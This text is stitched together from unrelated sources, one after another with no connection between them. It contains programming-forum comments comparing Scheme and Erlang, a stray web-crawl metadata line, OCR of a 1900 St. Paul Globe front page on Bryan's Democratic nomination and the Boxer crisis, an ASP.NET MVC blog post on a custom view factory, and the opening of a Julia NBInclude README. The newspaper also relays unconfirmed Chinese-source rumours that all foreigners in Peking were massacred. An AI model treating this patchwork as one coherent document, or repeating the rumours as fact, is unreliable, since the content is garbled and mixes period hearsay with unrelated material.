You could get in on the ground floor of maybe the next big dialect? Although that goes for Clojure too.
Arc’s syntax is horribly counter-intuitive to any Lisp/Scheme programmer (= for assignment, which is really dangerous when other Lisps use it for equality testing), and I really don’t see what it brings to the game. Esp. when it does not even have a real implementation yet.
If you don’t *want* to learn those other languages, fair enough. That’s your prerogative. But if your justification for your language choice is about “fundamentals” rather than just preference, that’s a different story.
I’d agree about Scheme in the sense that it is the “semantic assembly language”, analogous to how assembly language is the low-level language of hardware, not semantics. You get to write programs on the level of your own syntax tree and syntactic abstraction, and that’s powerful.
However, there are more to “fundamentals” of programming than just programming languages. Software is meant to solve problems, and program-oriented thinking is not the same as system-oriented thinking. To me, 99.999% of all languages focus on making a language that encourages perfect software: a language that prevents all errors, is easy to understand, is lightening fast, etc.
But the most interesting question I’ve heard in all of programming was asked by Joe Armstrong: How do you make reliable software in the presence of software and potentially even *hardware* errors? Most languages never ask the question, or simply shrug it off as being outside the scope of the responsibility of a language. But to me, I think that is an implied requirement for all software! Reliability isn’t about perfection (that most languages strive for, such as perfecting sophisticated typing or being more “pure” functional/OOP/declarative) it’s about *fault-tolerance*. That requires a different way of thinking. There are requirements here that are non-negotiable.
To me, the two “fundamental” languages are:
1. Scheme, to learn the structure and interpretation of all *programming* of software
2. Erlang (for now due to lack of other candidates), to learn how to create *software systems* that are fault tolerant. You don’t automatically get that from Scheme, or from the approach of the structure and interpretation of code, hence why I pick these *two* languages.
Notice I didn’t say “concurrency”. All the “Erlang-style concurrency” hype you hear about in other languages 100% absolutely misses the point. Concurrency is just one requirement on the way to fault-tolerance, the real goal. I highly suggest reading Joe Armstrong’s PhD thesis on Erlang’s website.
Lest you think I’m just promoting Erlang as a fanboy, etc. I’d like to mention that actually Python is my favorite language, but there is a real reason why I mention Erlang here: “fundamentals”. Fault-tolerance and software *system* architecture (NOT program architecture) are best learned in Erlang, among the currently existing languages. Algorithms, data structures, flow of execution, or best learned in something like Scheme.
Thanks, RobW, that’s interesting stuff. Appreciated.
You could try Kawa ( ). It’s a Scheme implementation that can also call Java. So you could learn only Scheme and then add in Java if you’d like later. Also under active development. The interface to Java seems as convenient as Clojure’s also.
Pingback: Tagore Smith on functional programming | The Reinvigorated Programmer | https://reprog.wordpress.com/2010/03/23/the-long-overdue-serious-attempt-at-lisp-part-1-which-lisp/ | CC-MAIN-2015-22 | refinedweb | 3,980 | 70.23 |
VOL. XXIII.-NO. 187.
Democratic National Convention Again Names
William Jennings Bryan as the
Party's Standard Bearer
Minority of the Resolutions Committee Made
Harmonious Action of Nominating
Body Possible.
KANSAS CITY, Mo., July 6.—William Jennings Bryan, of Nebraska, was tonight placed in nomination for the presidency on the Democratic ticket, on a platform denouncing imperialism, militarism and trusts, and a specific declaration for silver at the ratio of sixteen to one. The nomination came as the culmination of a frenzied demonstration in honor of the party leader, lasting twenty-seven minutes and giving utterance to all the pent-up emotions of the vast multitude. It followed, also, a fierce struggle through the last thirty-six hours concerning the platform declaration on silver and on
DAVID B. HILL.
The Hero of the Convention.
the relative position which the silver question is to maintain to the other great issues of the day.
It was late this afternoon when the convention was at last face to face with the presidential nomination. Earlier in the day there had been tedious delays, due to the inability of the platform committee to reconcile their differences and present a report. Until this was ready the convention managers beguiled the time by putting forward speakers of more or less prominence to keep the vast audience from becoming too restless.
The first session, beginning at 10 o'clock this morning, was entirely fruitless of results, and it was not until late in the afternoon, when the second session had begun, that the platform committee was at last able to reach an agreement.
Already its main features, embodying the sixteen to one principle, had become known to the delegates, and there was little delay in giving it unanimous approval. This ended the last chance for an open rupture on the question of principles, and left the way clear for the culminating business of the day—the nomination of a candidate.
The vast auditorium was filled to its utmost capacity when the moment arrived for the nomination to be made. Not only were the usual facilities afforded by tickets taxed to their utmost, but doorkeepers were given liberal instructions, under which the aisles and areas and all available spaces were packed to their full limit.
NOMINATION MADE.
When the call of states began for the purpose of placing candidates in nomination, Alabama yielded its place at the head of the list to Nebraska, and Oldham, of that state, made his way to the platform for the initial speech placing Mr. Bryan in nomination for the presidency. The orator was strongly voiced and entertaining, and yet, to the waiting delegates and spectators there was but one point to his speech, and that was the stirring peroration which closed with the name of William J. Bryan. This was the signal for the demonstration of the day, and in a common purpose the great concourse joined in a great tribute of enthusiastic devotion to the party leader. A huge oil painting of Bryan, measuring fifteen feet across, was brought down the main aisle before the delegates. At the same time the standards of the state delegations were torn from their sockets and waved on high, while umbrellas of red, white and blue, silk banners of the several states and many handsome and unique transparencies were borne about the building, amid the deafening clamor of 20,000 yelling, gesticulating men and women. All of the intensity of former demonstrations and much more was added to this final tribute to the leader.
MANY SECONDS.
When the demonstration had spent itself the speeches seconding the nomination of Mr. Bryan were in order. Senator White spoke for California, giving the tribute of the Pacific coast to the Nebraska candidate. When Colorado was reached that state yielded to Senator Hill, of New York. The audience had anxiously awaited the appearance of the distinguished New Yorker, and he was accorded a splendid reception, the entire audience rising and cheering wildly with the single exception of the little group of Tammany leaders, who sat silent throughout the cheers for their New York associate.
Mr. Hill was in fine voice, and his tribute to the Nebraskan touched a sympathetic chord in the hearts of the audience. He pictured Bryan as the champion of the plain people and of the workingmen, strong with the masses, with the farmers and with the artisans. When Hill declared, with dramatic intensity, that the candidate would have the support of his party—a united party—there was tremendous applause at the suggestion of Democratic unity. Aside from the brilliant eulogy of Bryan the speech of the New York leader was significant and attractive in its strong plea for unity.
The St. Paul Globe

"It is a time for union, not for division," he exclaimed to the rapturous approval of the great multitude facing him.
The eloquent Daniel, of Virginia, added his glowing tribute to the candidate, while former Gov. Pattison, of Pennsylvania, spoke for his state and for the East. Gov. McMillan, of Tennessee, voiced the wishes of a state which had "furnished three presidents."
HAWAII'S VOICE.
Hawaii, through its delegate, John H. Wise, made its first seconding speech in a Democratic national convention, and finally a sweet-voiced, pleasant-faced woman from Utah seconded the nomination of Mr. Bryan in behalf of her state. Then came the voting. State after state recorded its vote in behalf of the Nebraska candidate, giving him the unanimous votes of all the states and territories. The managers of the convention had decided that this was enough work for one day, and the nomination of a vice presidential candidate was allowed to go over until tomorrow.
Next to the demonstration for the party candidate, that greeting the announcement that imperialism was to be the paramount issue of this campaign was the most spontaneous and significant of the day. Senator Tillman read the platform, and with much force brought out the fact that imperialism was now given the first and supreme place among the issues of the party.
That the delegates and audience were in complete accord with this programme was shown by the long and continued applause, lasting over twenty-two minutes. Following this, the announcement that the 16 to 1 idea was retained received only a faint and short demonstration, the applause being continued only a few minutes. It was regarded as significant of the spirit of the delegates. The most stirring incident of the day was the appearance of Webster Davis, formerly assistant secretary of the interior in McKinley's administration, in a speech severely arraigning the Republican party for its lack of sympathy for the Boers, and formally announcing his allegiance to the Democratic party.
GREAT BATTLE.
But the great battle of the convention has not been fought under the eyes of cheering thousands, but in the privacy of the closely guarded quarters of the committee on platform. Here was waged throughout last night and again this morning one of the most remarkable struggles that has ever racked this historic party. On the one hand was the influence of Bryan and the absolute unity of devotion felt towards him and the cause of silver with which his name is inseparably linked. On the other hand were many of the patriarchs of the party, men like Daniel, of Virginia, insisting that the very life of the organization was endangered by hanging to its old issues, that the duty of the hour called for new issues based upon new and vital events.
This contest was at last narrowed down to the one issue of specifically reaffirming the party's adherence to a 16 to 1 standard, as desired by Mr. Bryan, or of reaffirming the silver plank in more gentle terms. And on this issue the brains, the sagacity, the persuasive eloquence and the best ability of the convention has for the last thirty-six hours been engaged in a battle royal for supremacy. And out of this fierce struggle the adherents of Bryan emerged scarred, but victorious. They have written the platform in their own way with 16 to 1. But it was a victory by a scratch, for a single vote would have turned the scale.
And it has not been a victory without concession, for in the final draft silver is no longer "paramount"; it is far down in the platform, while in the very forefront is the declaration that imperialism is the "paramount issue of this campaign."
There remains only the choice of a candidate for vice president, and the work of the convention is over. There is every evidence this choice will be quickly made tomorrow, although there is still doubt as to who the nominee will be.
NEXT BIG STRUGGLE ON.
Friends of Vice Presidential Candidates Are Busy.
KANSAS CITY, Mo., July 6.—The most important development in the vice presidential situation tonight was the announcement that when the roll of states is called tomorrow for the nomination of candidates for vice president, Alabama will yield to Florida, and Hon. R. D. McDonald, of that state, will place Eliot Danforth, of New York, in nomination. This programme became known during the session of the convention tonight, and was discussed by quite a number of the leading men in different delegations.
Another development was the unquestioned popularity of David B. Hill for the place, as manifested in the convention, and the desire expressed in many quarters for his selection.
The selection, however, is complicated by the fact that New York stands in the way of the selection of either Hill or Danforth. Hill does not want the nomination, and will take measures to prevent his selection. Danforth does want it, and would be nominated if New York would present him. But the convention will not force a candidate upon New York against the will of the delegation from that state. This probably will prevent the movement for Danforth from amounting to very much. It is pretty generally felt that this movement was inaugurated for the purpose of complimenting Hill and rebuking Croker for the manner in which Hill and his candidate, Danforth, were treated under the direction of Mr. Croker.
But the large state delegations will not lend themselves to any such proposition, for they are seeking a New York candidate whom New York will present with seriousness and who will strengthen the ticket.
SIDETRACKED.
The past two days have been so occupied with the platform that little or no progress has been made by the candidates for the vice presidency. So much
Continued on Fifth Page.
FRIDAY MORNING, JULY 6, 1900.—TEN PAGES.
WILLIAM JENNINGS BRYAN.
All Information Obtainable Tends to Confirm Belief That the Horrible
Story of Murder Is True.
Chinese Emperor Dead by Poison at Hands of Prince Tuan, and
Empress Dowager May Suffer a Like Fate.
LONDON, July 6, 2:30 a. m.—The story that all foreigners in Peking were murdered on June 30 or July 1 appears to be circulating simultaneously at Che Foo, Shanghai and Tien Tsin. Yet, as it is not confirmed by official dispatches and is not traceable to the southern viceroys, who are still in certain connection with Peking, there is a basis for the hope that it is untrue.
Cautious observers at Shanghai recognize that even though these reports are rejected, events in Peking must be galloping to a tragic end.
Correspondents of the Express at Shanghai gathered details from Chinese sources, which pieced together relate that when the foreigners' ammunition was exhausted the Boxers and imperial troops rushed the British legation and poured into the courtyard with fanatical fury. The foreign troops were so hopelessly outnumbered that their fate was certain. The moment the mob broke in, the courtyard was converted into a shambles. Others of the invaders spread into the interior of the building. One correspondent says:
"It is only left to hope that in the final rush of the murderous hordes the men of the legations had time to slay with their own hands their womenkind and children. The Chinese are whispering the terrible story under their breaths. Their attitude towards foreigners in the streets has undergone a strange change. The demeanor of the better class of Chinese is one of pity rather than of triumph. Even the rabble in the native quarters are silent.
"Something of this culminating tragedy in the ghastly history of recent events in Peking seems to pervade the very atmosphere here and to compel belief against all our hopes. The consul fears the report is too true, and the Chinese officials do not appear to seek reasons for a denial."
POISON OR SWORD.
Two Manchus, who have arrived at Shanghai, certify to the truth of the statement that Prince Tuan visited the palace and offered the emperor and the dowager empress the alternative of poison or the sword. The emperor, they say, took poison and died within an hour. The dowager empress also chose poison, but craftily swallowed only a portion of what was offered her and survived. On the same day the Chinese customs bureau was destroyed, Sir Robert Hart, the inspector of customs, and his staff escaping to the legation.
Intense indignation is felt in Shanghai against the action of the powers in restraining Japan from sending an army to Peking immediately. The powers are accused of being as guilty of murder as are Prince Tuan's fanatics, and Sir Robert Hart is blamed for not having informed the foreigners of the immense import of arms, especially a few weeks ago.
The Chinese commanders are preparing for a long, severe campaign, and are putting into operation plans drawn up by German officers last year for resisting an invasion from the seaboard by Russia.
The correspondent of the Daily Mail at Shanghai, telegraphing under date of July 5, 12:15 p. m., says that he believes that when official information comes regarding Peking it may include news of the outraging of English women and torturing of children. It may be taken for granted, he asserts, that all foreigners in Peking have been wiped out.
THEIR CASE HOPELESS.
Taotai Yu admitted to a correspondent that the case of the Europeans in Peking is utterly hopeless, in his opinion. He believes that if they have not yet been massacred it is only a matter of hours before they will be.
A letter brought by courier from Peking, received in Shanghai on July 4, says the Boxers are gathering huge forces around Peking, reinforcements arriving from all directions. This is taken to indicate a concert of action among the nobles, who are believed to have thrown in their lot with the Boxers. The emperor and the empress dowager, the letter reads, are completely under the thumb of Prince Tuan and Yang Ki.
Dispatches from Hong Kong say the "Triads," a secret society, are assuming a threatening demeanor on the mainland.
Li Hung Chang has sent 5,000 men to occupy the bogue forts at the mouth of the Canton river.
The Shanghai correspondent of the Daily Telegraph wires, under date of July 4:
"Yuan Shikai, governor of Shan Tung, telegraphs the French consul here that Prince Tuan is preparing an edict ordering the extermination of all foreigners. This is probably intended to prepare the public for the worst news.
"Chinese cumulative reports, which are generally believed here, declare all the foreigners in Peking to have been massacred.
"The safety of all foreigners in North China depends upon Japan's prompt action. Japan has 70,000 troops ready, but is prevented from sending them to China by international jealousies."
The morning papers have various continental dispatches handling the question as to why Japan does not send more troops to China, but none of them throws much light upon the subject.
LONDON, July 5.—The oft-repeated story of the massacre of all the whites in Peking is being retold today with a circumstantiality that almost convinces those who have hitherto refused to credit the sickening tales. The only hopeful feature of the evil news is the fact that it comes from Chinese sources at Shanghai, but it is realized that even if the tragedy has not yet been enacted, it cannot long be delayed unless help comes from unknown sources. Even the holding of Tien Tsin against the overwhelming hordes now seems to be a very remote possibility, while the safety of other treaty ports is seriously threatened.
A dispatch that came from Che Foo, dated yesterday, voices a fear that in view of the immense summer rains it will be impossible for forces to advance to Peking until autumn.
According to reports from Shanghai, the Chinese army, on the march southward from Peking, has reached Lofa. This is presumably Gen. Nieh Si Chang's force.
Continued on Fourth Page.
BULLETIN OF
IMPORTANT NEWS OF THE DAY
Weather Forecast for St. Paul.
Showers; Cooler.
1—Democratic Convention.
Nomination of Bryan.
Developments in China.
Vice Presidential Talk.
2—Tornado at White Bear.
Shriners in Town.
3—Minneapolis Matters.
Northwest News.
Sporting News.
Results of Ball Games.
4—Editorial Page.
D. B. Hill's Speech.
Oldham's Nominating Speech.
5—Convention Proceedings.
6—Convention Proceedings.
Big Event of the Day.
Silver Republicans.
7—Convention Proceedings.
Adopting the Platform.
The Democratic Platform.
8—Popular Wants.
News of Railroads.
N. P. Crop Report.
Supreme Court Decisions.
9—Markets of the World.
July Wheat, 78 1-8c.
Stocks Active.
Bar Silver, 61 5-8c.
10—In the Field of Labor.
Money for Militia.
State's Supply of Coal.
PRICE TWO CENTS.
Nominated a Second Time as Candidate of the
Democrats for the High Office
of President
Graphic Description of the Wild Demonstrations That Followed the Naming of the Candidate.
Staff Special to the Globe.
KANSAS CITY, Mo., July 5.—William Jennings Bryan was tonight nominated a second time as the candidate of the Democrats for the presidency of this land under circumstances which, if not as dramatic as followed on his "Crown of Thorns and Cross of Gold" shibboleth, were not lacking in the least in theatrical effects, ingeniously conceived and carefully executed.
A crowd of 25,000, assembled to view the leaders of the gold and silver Democrats cross swords in sharp debate, were astounded to find that the debate was off, and that after fighting all night the resolutions committee had been able to agree on a platform that would suit all. It was regarded as a splendidly executed platform, and the crowning triumph of its conception, perhaps, was the selection of B. R. Tillman, of South Carolina, to read it in place of Chairman Jones. Senator Tillman is an impressive personality. In spite of attributes not usually called lovely, in ringing tones and with an emphasis in thorough sympathy with every sentiment expressed in the long platform, the Southern pyrotechnist commanded undivided attention and added in no small measure to the enthusiasm of his reception. When the anti-imperialism plank was reached by Tillman with marked emphasis, the crowd cut loose, and for half an hour there was such another demonstration as marked the mention of Bryan's name Wednesday night. It was clearly the climax of the day and of the convention, and the two workmen who had been perched on the roof trusses all day to break out Old Glory at the critical moment were signaled not to wait for the nomination of Bryan.
Almost simultaneously, thousands of flags bearing anti-imperialistic mottoes were distributed on the main floor. In a moment a thousand fluttering flags added to the life of the scene. Marching and countermarching, the state banners, the Hawaiian and California flags and what not were to be seen in the parade about the hall. It was half an hour before Tillman could resume his reading, and he was twice thereafter interrupted by demonstrations.
When the resolutions had been adopted, and nominations were proceeded with, a similar demonstration followed the close of Oldham's tribute, and then a few minutes later the crowd resumed its habitual cries for "Hill," and Hill responded. He came to the line fully and openly, and in a moment yells from the gallery were remarking his re-entrance into the field of vice presidential possibilities. So alarming to the Towne forces was the reception given David B. that a little later the leaders lost no time in completing their arrangements for a demonstration in force before the various state delegations tonight.
Mr. Towne addressed an enthusiastic crowd of several thousand from the balcony of the Coates house, and the delegates are being impressed in every possible way with the popularity, magnetism and eloquence of the man from Duluth.
SENATOR TILLMAN, OF SOUTH CAROLINA.
Although the list of seconding speeches included two others who have been considered possible vice presidential timber, Pattison and Daniel, Hill's speech was the sensation of the day. The consensus of opinion among Towne's friends was that David had burned all his bridges behind him, and was further from the New York delegation than ever. Whether or not his friends can stampede the convention for him this morning is a question—a serious one to Towne.
—W. G. McMurray.
DETAILED STORY OF THE NOMINATION OF WILLIAM J. BRYAN.
HILL WON THE CONVENTION
Gracefully Accepted the Will of the Majority, and Paid High Tribute to the Nominee—Memorable Speeches.
CONVENTION HALL, July 5.—After the adoption of the platform and the Webster Davis incident, Chairman Richardson announced:
"The next business before the convention is the nomination of a candidate for the presidency of the United States. The clerk will call the roll of states."
Before doing so the secretary read the names of the members of the committee appointed by the chair to confer with the Populists and silver Republicans in accordance with the resolution offered by George Fred Williams at the morning session. They were: George Fred Williams, Massachusetts; J. G. Berry, Arkansas; W. H. Thompson, Nebraska; Charles Thomas, Colorado; J. S. Rose, Wisconsin; Thomas H. Martin, Virginia; J. G. McGuire, California; B. R. Tillman, South Carolina; Carter H. Harrison, Illinois.
"Alabama," the secretary then shouted, commencing the call of the roll.
"The state of Alabama," said the chairman of the delegation of that state, "yields to Nebraska the privilege of naming the next president of the United States."
W. D. Oldham, of Nebraska, who was to present the name of Mr. Bryan to the convention, was waiting by the chairman's desk, and as the chairman of the Alabama delegation resumed his seat he came forward and, with a few graceful words, expressed his appreciation of the favor extended by Alabama in surrendering its time to the state of Mr. Bryan.
Mr. Oldham is a man of about fifty years of age, something under middle size, with a slight forward stoop. His face is clean-shaven and his black hair was closely cropped. His voice is clear and pleasant, and carries far; his delivery was agreeable, and throughout his address he received the closest attention of the convention.
Mr. Oldham's speech will be found on the fourth page.
MADE BIG HIT.
He caught the fancy of the convention by his statement that the government of this country "is bounded on the north by the constitution; on the east by the Monroe doctrine; on the south by the Declaration of Independence, and on the west by the Ten Commandments."
"The prospects of the Democratic party are brighter than they were four years ago," he said, and out of the audience came a vigorous "no," uttered with considerable emphasis. "Yes, yes," came from several directions, to offset the assertion of the doubting Thomas.
The interruption caused Mr. Oldham to pause for a few seconds, but he caught his swing again and uttered a eulogy of Mr. Bryan which he delivered with great force. As he proceeded he raised both hands over his head and spoke with a slowness and energy that carried his voice to the farthest corner of the hall.
"And—that—man—is—William Jennings—Bryan," he concluded, bringing his hands lower with each word until the last had been uttered, when he brought them up with a sweep; but quicker than his motion was the answering cheer that swept across the convention, a simultaneous roar from all parts of the hall. Up went the delegates upon their chairs, over their heads went their hats, and above them all soared and rang the cheers for Bryan. The band loyally performed its share, but the noise of its creation was but a drop in the bucket. The members of the Nebraska delegation flung up a large banner bearing a likeness of Mr. Bryan upon one side, and upon the other "Nebraska" and a small portrait of Mr. Bryan, enclosed in a star. Whatever may have been the differences of delegates over the platform, they seemed to have forgotten them, and all were as one in favor of the man. New York vied with Nebraska in venting its enthusiasm. Mr. Croker was on a chair, both arms aloft, a flag in his right hand, which he waved vigorously.
MR. HILL CHEERS.
Mr. Hill was not behind him in the show of loyalty to the nominee, and, waving his arms, he let forth a volley of cheers that equaled those uttered by any man on the floor. Over in Illinois, Ohio and Indiana, where 16 to 1 is not popular, there was no hesitation now. The die was cast, the gage of battle lifted, and they swung into the line as fiercely as any that had stood unfaltering by Mr. Bryan in the fight before the committee on resolutions.
Round the hall started the Nebraska men with their huge banner, and, catching up their state emblems, the other delegations took up the march, waving flags and hats and cheering at the top of their voices without cessation save for the breath necessary to a fresh outburst.
The two women delegates from Utah joined in the parade, one of them carrying a small silk banner of white upon which was inscribed: "Greeting to William J. Bryan, from the Democratic Women of Utah."
As the women passed along the aisle in front of the New York delegation, one of the enthusiastic Tammany braves turned loose a war whoop that rivaled any previously uttered on this continent, and pounded one of the women with his small fists in token of appreciation. Far from resenting the blow, the woman smiled and pirouetted through the aisle formed of
Continued on Seventh Page.
In my previous two posts (one and two) discussing the use of AJAX within an ASP.NET MVC Framework application, I’ve tried to demonstrate some ways that the framework can be extended or modified. In keeping with this approach, I thought I’d show how it is possible to change the way that Views are resolved using a “View Factory”. Again, this is much more about the demonstration than the subject matter: i.e. AJAX is incidental to seeing how to use the MVC framework. Please read the previous posts if you want to follow the specific example I’m using here.
Usual disclaimers apply – and this is based on pre-release software that will no doubt change, and therefore this post will likely become outdated.
The key to this post, then, is that instead of using a single View that behaves differently according to whether or not AJAX is supported, I want to have two separate Views – one for AJAX, one for without.
To achieve this is pretty simple.
1. We need to create our own implementation of IViewFactory. This is responsible for locating and creating an instance of an IView (which both ViewPage and ViewUserControl implement).
2. To “inject” (all you DI fans excuse me borrowing the term without using a DI framework) our new View Factory into every Controller we are going to create our own IControllerFactory implementation.
3. We need to configure the framework to use our new Controller Factory.
4. Finally we can create two Views – an AJAX version and a pure HTML version.
Easy huh? Let's fly through the implementation of each of these...
To minimise my effort I’ve sub-classed the WebFormViewFactory;
public class AjaxViewFactory : WebFormViewFactory
{
    protected override IView CreateView(
        ControllerContext controllerContext,
        string viewName,
        string masterName, object viewData)
    {
        // Pull the "mode" value ("ajax" or "html") from the route data
        string mode = controllerContext.RouteData.Values["mode"] as string;
        IView view = null;
        try
        {
            // First try the suffixed view, e.g. "List-ajax" or "List-html"
            view = base.CreateView(controllerContext, viewName + "-" + mode,
                masterName, viewData);
        }
        catch (InvalidOperationException)
        {
            // Fall back to the un-suffixed view name if the suffixed one
            // was not found; otherwise rethrow
            if (view == null)
                view = base.CreateView(controllerContext, viewName,
                    masterName, viewData);
            else
                throw;
        }
        return view;
    }
}
Now I should imagine you're all screaming (and no, not because I don't check that "mode" isn't null – this is demo code). Truth is, I'd like the implementation of this to be different – perhaps by overriding WebFormViewFactory.GetTypeFromName, but some of the framework's members are private and not virtual... hence my hack.
Basically all we do here is append the value of “mode” (which is “ajax” or “html”) to the end of the view name. So a request for a “List” view will return “List-ajax” or “List-html”. If we can’t find a View by this name, we fall back to the version without a suffix. [Important: The catching of exceptions in this way as effectively anticipated business logic is strongly not recommended – this is the ugly code I was referring to. This is hard to maintain and could easily become a performance hit if you have lots of Views without a suffix, so in production code I would put the effort in to handle this properly – I haven’t here simply to save space and complexity]. I then reuse the standard functionality of the WebFormViewFactory to do the hard work of creating an instance.
This should make it pretty obvious how you could change this behaviour to your heart’s content. There is no reason why you couldn’t completely remove any remnant of the WebFormViewFactory – as long as you return an instance of an IView you’re away!
The Controller Factory is almost embarrassingly simple;
public class AjaxControllerFactory : IControllerFactory
{
    public IController CreateController(RequestContext context,
        Type controllerType)
    {
        Controller controller =
            (Controller)Activator.CreateInstance(controllerType);
        // Make sure every controller uses our View Factory
        controller.ViewFactory = new AjaxViewFactory();
        return controller;
    }
}
ControllerBuilder.Current.SetDefaultControllerFactory(
typeof(AjaxControllerFactory));
And that’s it.
To get my Views working I took the existing “People.aspx” View, and copied it twice to “People-ajax.aspx” and “People-html.aspx”. I then removed the if statement below;
<% if (ViewData.EnableAjax) { %>
    <%= Ajax.UpdateRegionLink<AjaxSampleController>(d =>
        d.UpdatePerson(emp.Id), "Individual", emp.Name) %>
<% } else { %>
    <%= Html.ActionLink(emp.Name, new { action = "ViewPeople",
        id = emp.Id })%>
<% } %>
... and instead left the relevant section in each View – i.e. the Ajax call in the “–ajax” view, and Html call in “-html” view.
Well folks, that’s all. I hope that’s a pretty clear demonstration of how easy it is to plug into the MVC pipeline. If you’re interested in IViewFactory specifically, head on over to MVCContrib – looks like some View Factories are in the code base. | http://blogs.msdn.com/b/simonince/archive/2008/02/04/multiple-views-with-mvc.aspx | CC-MAIN-2015-48 | refinedweb | 801 | 55.13 |
- was not declared in this scope
- No such file or directory
- undefined reference to
- error while loading shared libraries, or cannot open shared object file
The cause is actually very simple: the compiler is not told to find the right file in the right place. The discussion below is based on Linux using GCC for C and C++.
Problem 1: was not declared in this scope
Usually, this problem has nothing to do with your system settings or compiler configuration. It's a problem within your source code: at the top level, the function being called has not been declared. The reason can vary.
One reason is that the file declaring (or defining, if the declaration is done together with the definition) the function is not specified, e.g., the header file is not included. This can be easily fixed by including such a file in your source code.
Another reason is that you used the function outside the class or namespace in which it is declared.
Problem 2: No such file or directory for a header file
If a header file is not found, the preprocessor (the preprocessor part of the compiler) will raise the error No such file or directory. Depending on where the header files are supposed to be, there are different solutions.
Most C/C++ compilers treat the quote form #include "..." and the angle-bracket form #include <...> differently. Simply running
$ echo | gcc -E -Wp,-v -
will tell you the difference:
#include "..." search starts here:
#include <...> search starts here:
 /usr/lib/gcc/x86_64-linux-gnu/5/include
 /usr/local/include
 /usr/lib/gcc/x86_64-linux-gnu/5/include-fixed
 /usr/include/x86_64-linux-gnu
 /usr/include
Those directories listed under the section "#include <...> search starts here:" are referred to as standard system directories [1]. They come from the convention of Linux systems' file hierarchy.
If you want to expand the search for the angle-bracket form #include <...>, use the -I option. The preprocessor will search for header files in directories given by -I options before searching system directories. Hence, a header file in a -I directory will override its counterpart in the system directories and be used to compile your code.
For the quote form #include "...", the preprocessor will first search in the directory containing the source file, and then all the directories specified after the -iquote option.
The example below shows how -I and -iquote append search paths:
$ echo | gcc -iquote/home/forrest/Downloads -I/home/forrest/Dropbox -E -Wp,-v -
#include "..." search starts here:
 /home/forrest/Downloads
#include <...> search starts here:
 /home/forrest/Dropbox
 /usr/lib/gcc/x86_64-linux-gnu/5/include
 /usr/local/include
 /usr/lib/gcc/x86_64-linux-gnu/5/include-fixed
 /usr/include/x86_64-linux-gnu
 /usr/include
So, if you have the following directives in your code, called mycode.c:
#include <xyz.h>
#include "abc/xyz.h"
and your GCC command is like this:
gcc mycode.c -I/opq/ -iquote/uvw
then GCC's preprocessor (again, it's part of GCC) will look for header files in the following full paths (on Ubuntu Linux 16.04), in addition to the search in system directories:
/opq/xyz.h
/uvw/abc/xyz.h
According to the GCC documentation [1], it searches for header files in the quote form #include "..." before searching for the angle-bracket form #include <...>.
Further specifications can be achieved using two other options, -isystem and -idirafter. They are all well documented in the GCC documentation [2].
Problem 3: undefined reference to
You probably see an error like this:
face.cpp:(.text._ZN2cv3Mat7releaseEv[_ZN2cv3Mat7releaseEv]+0x4b): undefined reference to `cv::Mat::deallocate()'
collect2: error: ld returned 1 exit status
This is a link-time error, raised when the linker ld (which is called automatically when you use GCC) cannot find the binary library that contains at least one function called by your code.
To fix it, first tell the compiler (actually, its linker part) the path containing library files using the -L option [2], and then the library file names using the -l option [4]. If we denote the value after -l as X and the value after -L as Y, the compiler will search for a file called libX.so under every directory Y. That's why on (almost) all Linux systems, a shared library file name begins with lib and ends with the suffix .so, such as libopencv_core.so.
For example, the command
$ g++ face.cpp -L/opencv/lib -lopencv_core -lopencv_videoio
will ask the linker to find the following binary library files:
/opencv/lib/libopencv_core.so
/opencv/lib/libopencv_videoio.so
Note that you may not be able to use some shell directives, such as ~, after the -L option.
In most cases, you do not need the -L option because the compiler (again, its linker part) automatically searches a set of system directories. When you have to, some tools can help you, such as pkg-config. I will write about that in another blog post.
Problem 4: error while loading shared libraries, or cannot open shared object file
Now your program has been successfully compiled. When running it, you probably see an error like this:
./a.out: error while loading shared libraries: libopencv_core.so.3.3: cannot open shared object file: No such file or directory
This problem comes from the loader. Unlike the link-time error above, this is a run-time error. The shared library file names are usually hardcoded into your binary program. To fix it, simply tell the loader where to find the specified shared library files. There are multiple ways.
Solution 1: Most Linux systems maintain an environment variable LD_LIBRARY_PATH, and the loader will search for binary library files requested by a program in all directories listed in LD_LIBRARY_PATH, on top of a set of standard system directories such as /lib or /usr/lib. Setting LD_LIBRARY_PATH is like setting any other environment variable, e.g., export on the shell, or edit and source ~/.bashrc.
Solution 2: Most Linux systems also maintain a shared library cache built by a program called ldconfig. It remembers the default location of each shared library file. Simply run

$ ldconfig -p

and it will tell you the mapping from shared library files to absolute paths in the system, e.g.,

2591 libs found in cache `/etc/ld.so.cache'
	libzzipwrap-0.so.13 (libc6,x86-64) => /usr/lib/x86_64-linux-gnu/libzzipwrap-0.so.13
	libzzipmmapped-0.so.13 (libc6,x86-64) => /usr/lib/x86_64-linux-gnu/libzzipmmapped-0.so.13
	libzzipfseeko-0.so.13 (libc6,x86-64) => /usr/lib/x86_64-linux-gnu/libzzipfseeko-0.so.13
To change the mapping, simply edit /etc/ld.so.conf and then run

$ sudo ldconfig

to rebuild the cache.
Solution 3: The two changes above are applied system-wide. A more flexible way is to specify the location of the shared libraries when linking your code, using the -Wl,-rpath option, e.g.,

g++ face.cpp -idirafter ~/Downloads/opencv_TBB_install/include -L/home/forrest/Downloads/opencv_TBB_install/lib -lopencv_core -lopencv_objdetect -lopencv_highgui -lopencv_imgproc -lopencv_videoio -Wl,-rpath=/home/forrest/Downloads/opencv_TBB_install/lib
The disadvantage of Solution 3 is that if you change the location of the shared library, you will run into the error again.
References:
[1] Filesystem Hierarchy,
[2] GCC options for directories
[3] Shared Library How-To,
[4] GCC options for linking, | http://forrestbao.blogspot.com/2017/08/solution-to-most-not-found-or-undefined.html | CC-MAIN-2017-39 | refinedweb | 1,187 | 57.47 |
NBInclude is a package for the Julia language which allows you to include and execute IJulia (Julia-language Jupyter) notebook files just as you would include an ordinary Julia file. That is, analogous to doing
include("myfile.jl") in Julia to execute
myfile.jl, you can do
using NBInclude
nbinclude("myfile.ipynb")
to execute all of the code cells in the IJulia notebook
myfile.ipynb. Similar to
include, the value of the last evaluated expression in the last evaluated code cell is returned.
The goal of this package is to make notebook files just as easy to incorporate into Julia programs as ordinary Julia (
.jl) files, giving you the advantages of a notebook (integrated code, formatted text, equations, graphics, and other results) while retaining the modularity and re-usability of
.jl files.
Key features of NBInclude are:
- Code is executed in the context of the calling module, just as with include.
- In error messages and backtraces, the code location is given as myfile.ipynb:In[N]:M for line M in input cell N of the myfile.ipynb notebook. Un-numbered cells (e.g. unevaluated cells) are given a number +N for the N-th nonempty cell in the notebook. You can use nbinclude("myfile.ipynb", renumber=true) to automatically renumber the cells in sequence (as if you had selected Run All from the Jupyter Cell menu), without altering the file.
